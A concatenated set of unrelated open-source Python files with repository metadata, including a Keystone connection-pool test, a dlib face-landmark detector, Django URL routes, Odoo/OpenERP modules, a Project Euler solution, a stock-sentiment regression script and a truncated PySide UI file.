# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
import mock
import six
from six.moves import queue
import testtools
from testtools import matchers
from keystone.common.cache import _memcache_pool
from keystone import exception
from keystone.tests.unit import core
class _TestConnectionPool(_memcache_pool.ConnectionPool):
destroyed_value = 'destroyed'
def _create_connection(self):
return mock.MagicMock()
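    # The pooled "connection" is a MagicMock, so _destroy_connection can simply
    # call it; tests later assert the call was made with destroyed_value.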
def _destroy_connection(self, conn):
conn(self.destroyed_value)
class TestConnectionPool(core.TestCase):
def setUp(self):
super(TestConnectionPool, self).setUp()
self.unused_timeout = 10
self.maxsize = 2
self.connection_pool = _TestConnectionPool(
maxsize=self.maxsize,
unused_timeout=self.unused_timeout)
self.addCleanup(self.cleanup_instance('connection_pool'))
def test_get_context_manager(self):
self.assertThat(self.connection_pool.queue, matchers.HasLength(0))
with self.connection_pool.acquire() as conn:
self.assertEqual(1, self.connection_pool._acquired)
self.assertEqual(0, self.connection_pool._acquired)
self.assertThat(self.connection_pool.queue, matchers.HasLength(1))
self.assertEqual(conn, self.connection_pool.queue[0].connection)
def test_cleanup_pool(self):
self.test_get_context_manager()
newtime = time.time() + self.unused_timeout * 2
non_expired_connection = _memcache_pool._PoolItem(
ttl=(newtime * 2),
connection=mock.MagicMock())
self.connection_pool.queue.append(non_expired_connection)
self.assertThat(self.connection_pool.queue, matchers.HasLength(2))
with mock.patch.object(time, 'time', return_value=newtime):
conn = self.connection_pool.queue[0].connection
with self.connection_pool.acquire():
pass
conn.assert_has_calls(
[mock.call(self.connection_pool.destroyed_value)])
self.assertThat(self.connection_pool.queue, matchers.HasLength(1))
self.assertEqual(0, non_expired_connection.connection.call_count)
def test_acquire_conn_exception_returns_acquired_count(self):
class TestException(Exception):
pass
with mock.patch.object(_TestConnectionPool, '_create_connection',
side_effect=TestException):
with testtools.ExpectedException(TestException):
with self.connection_pool.acquire():
pass
self.assertThat(self.connection_pool.queue,
matchers.HasLength(0))
self.assertEqual(0, self.connection_pool._acquired)
def test_connection_pool_limits_maximum_connections(self):
# NOTE(morganfainberg): To ensure we don't lockup tests until the
# job limit, explicitly call .get_nowait() and .put_nowait() in this
# case.
conn1 = self.connection_pool.get_nowait()
conn2 = self.connection_pool.get_nowait()
# Use a nowait version to raise an Empty exception indicating we would
# not get another connection until one is placed back into the queue.
self.assertRaises(queue.Empty, self.connection_pool.get_nowait)
# Place the connections back into the pool.
self.connection_pool.put_nowait(conn1)
self.connection_pool.put_nowait(conn2)
# Make sure we can get a connection out of the pool again.
self.connection_pool.get_nowait()
def test_connection_pool_maximum_connection_get_timeout(self):
connection_pool = _TestConnectionPool(
maxsize=1,
unused_timeout=self.unused_timeout,
conn_get_timeout=0)
def _acquire_connection():
with connection_pool.acquire():
pass
# Make sure we've consumed the only available connection from the pool
conn = connection_pool.get_nowait()
self.assertRaises(exception.UnexpectedError, _acquire_connection)
# Put the connection back and ensure we can acquire the connection
# after it is available.
connection_pool.put_nowait(conn)
_acquire_connection()
class TestMemcacheClientOverrides(core.BaseTestCase):
def test_client_stripped_of_threading_local(self):
"""threading.local overrides are restored for _MemcacheClient"""
client_class = _memcache_pool._MemcacheClient
# get the genuine thread._local from MRO
thread_local = client_class.__mro__[2]
self.assertTrue(thread_local is threading.local)
for field in six.iterkeys(thread_local.__dict__):
if field not in ('__dict__', '__weakref__'):
self.assertNotEqual(id(getattr(thread_local, field, None)),
id(getattr(client_class, field, None)))
|
takeshineshiro/keystone
|
keystone/tests/unit/common/test_connection_pool.py
|
Python
|
apache-2.0
| 5,436
|
"""
Created on Mon Mar 20 12:28:21 2017
@author: Hriddhi Dey
This module contains the DetectLandmarks class.
"""
import os.path
import sys
from urllib.request import urlretrieve
import cv2
import dlib
import numpy
PREDICTOR_PATH = "shape_predictor_68_face_landmarks.dat"
CASC_PATH = "haarcascade_frontalface_default.xml"
class DetectLandmarks(object):
"""
This is the class responsible for landmark detection on a human face.
Functions available for use:
1. get_face_data: Returns all detected landmarks for a face.
2. get_lips: Returns points of lips for a face.
3. get_upper_eyelids: Returns points of eyeliner for a face.
"""
IMAGE_DATA = 'IMAGE_DATA'
FILE_READ = 'FILE_READ'
NETWORK_BYTE_STREAM = 'NETWORK_BYTE_STREAM'
def __init__(self):
""" Initiator for DetectLandmarks class.
Downloads the predictor file if not available.
Raises:
`Exception`, if download of predictor fails.
"""
if not os.path.isfile(PREDICTOR_PATH):
try:
print ('Predictor not found. Downloading...this may take a while...')
url = 'https://github.com/hriddhidey/visage/blob/master/visage/shape_predictor_68_face_landmarks.dat?raw=true'
def dl_progress(count, block_size, total_size):
""" Show download progress bar. """
percent = int(count*block_size*100/total_size)
sys.stdout.write("\r" + 'Progress:' + "...%d%%" % percent)
sys.stdout.flush()
urlretrieve(
url,
PREDICTOR_PATH,
reporthook=dl_progress
)
print ('Predictor downloaded.')
except IOError:
                print ('Download failed. Try again with a reliable network connection.')
raise IOError
self.predictor = dlib.shape_predictor(PREDICTOR_PATH)
self.cascade = cv2.CascadeClassifier(CASC_PATH)
self.detector = dlib.get_frontal_face_detector()
def __get_landmarks(self, image):
""" Extract the landmarks from a given image.
Returns `None` if no landmarks found.
"""
try:
rects = self.detector(image, 1)
size = len(rects)
            if size == 0:
                return None
return numpy.matrix([[p.x, p.y] for p in self.predictor(image, rects[0]).parts()])
except Exception:
return None
def get_face_data(self, image_file, flag):
"""
Returns all facial landmarks in a given image.
______________________________________________
Args:
1. `image_file`:
Either of three options:\n
                a. (numpy.ndarray) Image data after being read with cv2.imread()\n
b. File path of locally stored image file.\n
c. Byte stream being received over multipart network request.\n\n
2. `flag`:
Used to denote the type of image_file parameter being passed.
                Possible values are IMAGE_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
By default its value is IMAGE_DATA, and assumes imread() image is passed.
Returns:
            numpy matrix of all detected facial landmark points.
Error:
Returns `None` if face not found in image.
"""
image = 0
if flag == self.FILE_READ:
image = cv2.imread(image_file)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
elif flag == self.NETWORK_BYTE_STREAM:
image = cv2.imdecode(
numpy.fromstring(image_file.read(), numpy.uint8), cv2.IMREAD_UNCHANGED
)
elif flag == self.IMAGE_DATA or flag is None:
image = image_file
landmarks = self.__get_landmarks(image)
        if landmarks is None:
            return None
return landmarks
def get_lips(self, image_file, flag=None):
"""
Returns points for lips in given image.
_______________________________________
Args:
1. `image_file`:
Either of three options:\n
                a. (numpy.ndarray) Image data after being read with cv2.imread()\n
                b. File path of locally stored image file.\n
                c. Byte stream being received over multipart network request.\n\n
            2. `flag`:
                Used to denote the type of image_file parameter being passed.
                Possible values are IMAGE_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
By default its value is IMAGE_DATA, and assumes imread() image is passed.
Returns:
String with list of detected points of lips.
Error:
Returns `None` if face not found in image.
"""
landmarks = self.get_face_data(image_file, flag)
if landmarks is None:
return None
lips = ""
for point in landmarks[48:]:
lips += str(point).replace('[', '').replace(']', '') + '\n'
return lips
def get_upper_eyelids(self, image_file, flag=None):
"""
Returns points for upper eyelids in given image.
________________________________________________
Args:
1. `image_file`:
Either of three options:\n
                a. (numpy.ndarray) Image data after being read with cv2.imread()\n
                b. File path of locally stored image file.\n
                c. Byte stream being received over multipart network request.\n\n
            2. `flag`:
                Used to denote the type of image_file parameter being passed.
                Possible values are IMAGE_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
                By default its value is IMAGE_DATA, and assumes imread() image is passed.
        Returns:
            String with list of detected points of upper eyelids.
Error:
Returns `None` if face not found in image.
"""
landmarks = self.get_face_data(image_file, flag)
if landmarks is None:
return None
liner = ""
for point in landmarks[36:40]:
liner += str(point).replace('[', '').replace(']', '') + '\n'
liner += '\n'
for point in landmarks[42:46]:
liner += str(point).replace('[', '').replace(']', '') + '\n'
return liner
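# Hedged usage sketch (not part of the original module): assumes an image file
# 'face.jpg' exists locally; FILE_READ is the class constant defined above.
if __name__ == '__main__':
    DETECTOR = DetectLandmarks()
    LIPS = DETECTOR.get_lips('face.jpg', flag=DetectLandmarks.FILE_READ)
    print('No face found.' if LIPS is None else LIPS)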
|
hriddhidey/visage
|
visage/detect_features.py
|
Python
|
mit
| 6,555
|
from django.conf.urls import patterns, include, url
from django.conf.urls.defaults import handler404, handler500
from django.contrib import admin
from youtune import settings
from youtune.account import views as account_views, models as account_models
from youtune.frontend import views as frontend_views
from youtune.api import resources, views
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(resources.UserProfileResource())
v1_api.register(resources.FileResource())
v1_api.register(resources.ChannelResource())
v1_api.register(resources.CommentResource())
admin.autodiscover()
handler404 = frontend_views.Error404View.as_view()
handler500 = frontend_views.Error500View.as_view()
urlpatterns = patterns(
'',
# Switch to API-based JS views
url(r'^$', views.index, name='index'),
# Upload view
url(r'^upload/', include('youtune.fileupload.urls')),
# API
url(r'^api/', include(v1_api.urls)),
    url(r'^server/',
frontend_views.HomeView.as_view(), name='home'),
url(r'^search',
frontend_views.SearchView.as_view(), name='search'),
url(r'^admin/doc/', include(
'django.contrib.admindocs.urls'), name='admin_doc'),
url(r'^admin/', include(admin.site.urls), name='admin'),
url(r'^i18n/', include('django.conf.urls.i18n')),
# Registration, login, logout
url(r'^register/$',
account_views.RegistrationView.as_view(),
name='registration'),
url(r'^login/$', 'django.contrib.auth.views.login', {
'template_name': 'login.html'}, name='login'),
url(r'^logout/$', 'django.contrib.auth.views.logout', {
'template_name': 'logout.html'}, name='logout'),
# Profile, account
url(r'^user/(?P<username>' +
account_models.USERNAME_REGEX +
')/$', frontend_views.UserView.as_view(),
name='profile'),
url(r'^account/$',
account_views.AccountChangeView.as_view(
), name='account'),
url(r'^account/password/change/$',
account_views.PasswordChangeView.as_view(
), name='password_change'),
url(r'^account/confirmation/$',
account_views.EmailConfirmationSendToken.as_view(),
name='email_confirmation_send_token'),
url(r'^account/confirmation/token/(?:(?P<confirmation_token>\w+)/)?$',
account_views.EmailConfirmationProcessToken.as_view(
), name='email_confirmaton_process_token'),
# Facebook
url(r'^facebook/login/$',
account_views.FacebookLoginView.as_view(
), name='facebook_login'),
url(r'^facebook/callback/$',
account_views.FacebookCallbackView.as_view(
), name='facebook_callback'),
)
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^500/$', handler500, name='500'),
url(r'^404/$', handler404, name='404'),
url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT,
})
)
|
Irrialite/YouTune
|
youtune/urls.py
|
Python
|
bsd-3-clause
| 3,081
|
'''
Created on 24.05.2014
@author: alex
'''
class Person(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
|
sora7/listparse
|
OLD/CertainProg2/src/listparse/parsers/wa.py
|
Python
|
gpl-2.0
| 167
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Tournament.league'
db.add_column('League_tournament', 'league',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['League.League']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Tournament.league'
db.delete_column('League_tournament', 'league_id')
models = {
'League.league': {
'Meta': {'object_name': 'League'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'League.player': {
'Meta': {'object_name': 'Player'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'League.tournament': {
'Meta': {'object_name': 'Tournament'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'league': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['League.League']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
}
}
complete_apps = ['League']
|
RedBulli/Django_SnookerStats
|
League/migrations/0004_league_to_tournament.py
|
Python
|
bsd-3-clause
| 1,572
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 KMEE (http://www.kmee.com.br)
# @author Luis Felipe Mileo <mileo@kmee.com.br>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
class AccountAnalyticLine(osv.osv):
_inherit = 'account.analytic.line'
def invoice_cost_create(self, cr, uid, ids, data=None, context=None):
inv_obj = self.pool.get('account.invoice')
line_obj = self.pool.get('account.invoice.line')
        if context is None:
            context = {}
        context.update({'type': 'out_invoice'})
invoice_ids = super(AccountAnalyticLine, self).invoice_cost_create( cr, uid, ids, data, context)
for invoice in inv_obj.browse(cr, uid, invoice_ids, context=context):
line_ids = line_obj.search(cr, uid, [('invoice_id', '=', invoice.id)])
if invoice.payment_term:
payment_term = invoice.payment_term.id
else:
payment_term = False
if invoice.partner_bank_id:
bank = invoice.partner_bank_id.id
else:
bank = False
if invoice.fiscal_category_id:
fiscal_category_id = invoice.fiscal_category_id.id
else:
fiscal_category_id = False
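            # re-run the partner onchange so the invoice picks up the partner's
            # fiscal position; the result is pushed to each line and the invoice below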
onchange = inv_obj.onchange_partner_id(cr, uid, [invoice.id], 'out_invoice', invoice.partner_id.id, invoice.date_invoice, payment_term, bank, invoice.company_id.id, fiscal_category_id)
parent_fposition_id = onchange['value']['fiscal_position']
for line in invoice.invoice_line:
result = line_obj.product_id_change(cr, uid, ids, line.product_id.id, line.uos_id.id, line.quantity, line.name,
'out_invoice', invoice.partner_id.id,
fposition_id=False, price_unit=line.price_unit,
currency_id=invoice.currency_id.id, context=context, company_id=invoice.company_id.id,
parent_fiscal_category_id=fiscal_category_id,
parent_fposition_id=parent_fposition_id)
line_obj.write(cr, uid, [line.id],result['value'],context)
inv_obj.write(cr, uid, [invoice.id], onchange['value'], context=context)
return invoice_ids
|
christiandev/l10n-brazil
|
__unported__/l10n_br_hr_timesheet_invoice/hr_timesheet_invoice.py
|
Python
|
agpl-3.0
| 3,193
|
#Project Euler Problem 4
#A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 * 99.
#Find the largest palindrome made from the product of two 3-digit numbers.
def palindrome(test):
    while len(test) > 2:
        if test[0] == test[-1]:
            #strip exactly one character from each end; rstrip/lstrip removed every
            #repeated edge character, which crashed on inputs like "122221"
            test = test[1:-1]
        else:
            return False
    return len(test) < 2 or test[0] == test[-1]
#print palindrome(str(99000009))
def palindrome2(test):
if test == "".join(reversed(test)):
return True
else:
return False
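#e.g. palindrome2("9009") -> True, palindrome2("9019") -> False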
#print palindrome2("31213")
def largest_palindrome_from_3digitproducts():
hi_p = 0
t1 = 999
t2 = 999
count = 0
while t1 >= 100:
t2 = 999 - count
#print "t1 = {}".format(t1)
while t2 >= 1:
#print "t2 = {}".format(t2)
test = t1*t2
if palindrome2(str(test)) == True and test > hi_p:
hi_p = test
#print hi_p
t2 -=1
count += 1
t1 -=1
return "hi_p = {}".format(hi_p)
print largest_palindrome_from_3digitproducts()
def largest_palindrome_from_3digitproductsr(test=999): #with recursion (doesn't work yet) (semantic error cos only 999*999 and 999*998 not 999*997)
large_num = test * test
large_num2 = test * (test-1)
if palindrome(str(large_num)) == True:
return large_num
elif palindrome(str(large_num2)) == True:
return large_num2
else:
return largest_palindrome_from_3digitproductsr(test-1)
#print largest_palindrome_from_3digitproductsr()
"""
print 9*9 #highest square #digits involved 1
print 9*8 #new number times highest #because old digits finished, add new digit
print 8*8 #new squared #multiply involved digit by all involved hi to low
print 9*7 #new digit times highest
print 8*7#new times next highest
print 9*6#new2 times highest
print 7*7#new squared #new2 now new
print 8*6#new times next highest
print 9*5#
print 7*6
print 8*5
print 6*6
print 9*4
print 7*5
print 8*4
print 6*5
print 7*4
print 9*3
print 5*5
print 8*3
print 6*4
print 7*3
print 5*4
print 9*2
print 6*3
print 8*2
print 4*4
print 5*3
print 7*2
print 6*2
print 4*3
print 5*2
print 9*1
print 3*3
print 8*1
print 4*2
print 7*1
print 6*1
print 3*2
print 5*1
print 4*1
print 2*2
print 3*1
print 2*1
print 1*1 """
|
ieuan1630-cmis/ieuan1630-cmis-cs2
|
pep4.py
|
Python
|
cc0-1.0
| 2,405
|
""" This module analyzes the sentiment data provided by the American Association of Individual Investors ("AAII") which collects sentiment data from its members on
a weekly basis in regards to the 6 months’ stock market outlook. The module analyzes whether there is a connection between investor sentiment
and future performance of the S&P 500. The S&P 500 performance is measured in the relative change over 6 months.
The AAII provides three types of sentiment namely bullish, neutral, and bearish such that bullish + neutral + bearish = 1.
"""
import quandl
import datetime
import numpy as np
from sklearn import linear_model as lm
from sklearn.preprocessing import PolynomialFeatures as pf
from matplotlib import pyplot
def main(col= 1, deg = 1):
""" Main function which is called at the end of this file. Takes two optional int parameters. col is the column on which
the regression is to be performed, for example col = 1 corresponds to the bullish investors; deg determines the degree of the polynomial regression function.
Check the data.col attribute for a list of all column names. """
api_key = 'pqxsHzei5fGpxxCZ-yKH'
aaii = quandl.dataset('AAII','AAII_SENTIMENT',api_key)
regdata = createData(aaii)
clf = lm.TheilSenRegressor()
poly = pf(degree = deg)
X = np.array([e for e in regdata[:,col]]).reshape(-1,1)
Y = np.array([e for e in regdata[:,4]])
clf.fit(poly.fit_transform(X),Y)
print('Regression coefficients: {0}'.format(clf.coef_))
linsp = np.arange(0., 1., 0.2).reshape(-1,1)
plotY = clf.predict(poly.fit_transform(linsp))
pyplot.plot(X,Y, 'o', linsp, plotY)
pyplot.show()
def createData(data, period = 168):
"""The function createData takes a quandl.dataset object and an optional int parameter period and returns a numpy.array object containing the
data to be used in the regression analysis. The output columns are as follows: (0) Date, (1) percentage of bullish investors, (2) percentage of neutral investors,
(3) percentage of bearish investors, (4) change in the S&P500 between the date of the data and 6 months later (period = 168 days). """
result = []
endDate = data.end - datetime.timedelta(days = period)
iterData = [e for e in data.data if e[0] < endDate and (e[12] != None and e[1] != None and e[2] != None and e[3] != None)]
# Some of the earlier dates are missing some data points. The above if condition filters out all incomplete data points and restricts the analysis to dates that are up to 6 months before the latest data point.
for e in iterData:
futureValue = data.getFutureValue(e[0],period)[12]
        # Determines the value of the S&P500 6 months later. The if condition above ensured that such a data point exists.
deltaSP = futureValue - e[12]
if e[12] == 0:
fraction = 0
else:
fraction = deltaSP/e[12]
result.append([e[0], e[1], e[2], e[3], fraction])
return np.array(result)
main()
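# Hypothetical alternative invocation (not in the original script): main(col=3, deg=2)
# would regress the 6-month S&P 500 change on the bearish fraction with a quadratic
# fit, per the column layout documented in createData.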
|
kscheltat/quandl
|
docs/AAII.py
|
Python
|
gpl-3.0
| 3,088
|
{
'name': 'CookieBar',
'category': 'Website',
'summary': 'Informs visitors about storing cookies on their browser',
'version': '1.0',
'description': """
CookieBar
======================================
Informs visitors about storing cookies on their browser
""",
'author': 'Nedas Žilinskas <nedas.zilinskas@gmail.com>',
'website': 'http://nedaszilinskas.com',
'depends': ['website'],
'data': [
'data/x_cookiebar_config.xml',
'views/assets.xml',
'views/views.xml',
'views/templates.xml'
],
'installable': True
}
|
nedaszilinskas/Odoo-CMS-CookieBar
|
website_cookiebar/__openerp__.py
|
Python
|
mit
| 596
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'builder.ui'
#
# Created: Mon May 22 10:30:45 2017
# by: pyside-uic 0.2.15 running on PySide 1.2.4
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui, QtWebKit  # QtWebKit provides the QWebView widgets created below
class Ui_pandapower(object):
def setupUi(self, pandapower):
pandapower.setObjectName("pandapower")
pandapower.resize(1023, 702)
self.centralwidget = QtGui.QWidget(pandapower)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 1011, 661))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.tabWidget = QtGui.QTabWidget(self.verticalLayoutWidget)
self.tabWidget.setObjectName("tabWidget")
self.main = QtGui.QWidget()
self.main.setObjectName("main")
self.main_save = QtGui.QPushButton(self.main)
self.main_save.setGeometry(QtCore.QRect(10, 90, 91, 31))
self.main_save.setObjectName("main_save")
self.main_losses = QtGui.QPushButton(self.main)
self.main_losses.setGeometry(QtCore.QRect(10, 170, 91, 31))
self.main_losses.setObjectName("main_losses")
self.main_load = QtGui.QPushButton(self.main)
self.main_load.setGeometry(QtCore.QRect(10, 50, 91, 31))
self.main_load.setObjectName("main_load")
self.main_solve = QtGui.QPushButton(self.main)
self.main_solve.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.main_solve.setObjectName("main_solve")
self.main_message = QtGui.QTextBrowser(self.main)
self.main_message.setGeometry(QtCore.QRect(110, 10, 861, 581))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 85, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
